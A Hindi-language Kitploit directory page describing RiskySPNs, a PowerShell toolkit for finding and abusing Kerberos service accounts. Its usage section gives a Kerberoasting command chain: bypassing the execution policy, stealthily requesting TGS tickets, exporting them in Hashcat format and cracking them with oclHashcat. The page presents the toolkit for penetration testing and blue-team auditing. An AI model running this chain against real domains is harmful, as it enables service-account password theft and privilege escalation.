Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/cyberark/riskyspn
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubcyberark/riskyspn

RiskySPN

जोखिम भरे SPNs का पता लगाएँ और उनका दुरुपयोग करें

रिपॉजिटरी देखें
2657339 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RiskySPNs

RiskySPNs PowerShell स्क्रिप्ट्स का एक संग्रह है जो SPN (सर्विस प्रिंसिपल नेम) से जुड़े खातों का पता लगाने और उनका दुरुपयोग करने पर केंद्रित है। यह मॉड्यूल ब्लू टीमों को संभावित जोखिम भरे SPN की पहचान करने में मदद कर सकता है, साथ ही रेड टीमों को केरबेरोस और एक्टिव डायरेक्टरी का लाभ उठाकर विशेषाधिकार बढ़ाने में सहायता कर सकता है।

विस्तृत जानकारी के लिए: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/

उपयोग

मॉड्यूल इंस्टॉल करें

root@kitploit:~
Import-Module .\RiskySPNs.psm1

या केवल स्क्रिप्ट लोड करें (आप IEX वेब से भी कर सकते हैं)

root@kitploit:~
. .\Find-PotentiallyCrackableAccounts.ps1

सुनिश्चित करें कि Set-ExecutionPolicy Unrestricted या Bypass पर सेट हो

किसी फ़ंक्शन के बारे में जानकारी प्राप्त करें (बहुत विस्तृत :))

root@kitploit:~
Get-Help Get-TGSCipher -Full

सभी फ़ंक्शन में -Verbose मोड भी उपलब्ध है

संवेदनशील SPN खोजें

संभावित कमज़ोर खाते खोजें

root@kitploit:~
Find-PotentiallyCrackableAccounts

संवेदनशील + RC4 = $$$

संवेदनशील खातों के बारे में पूर्ण विस्तृत रिपोर्ट उत्पन्न करें (CISO <3)

root@kitploit:~
Export-PotentiallyCrackableAccounts

टिकट प्राप्त करें

SPN के लिए Kerberos TGS का अनुरोध करें

root@kitploit:~
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"

या

root@kitploit:~
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

मज़ेदार चीज़ें :)

root@kitploit:~
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3
टूल डाउनलोड करें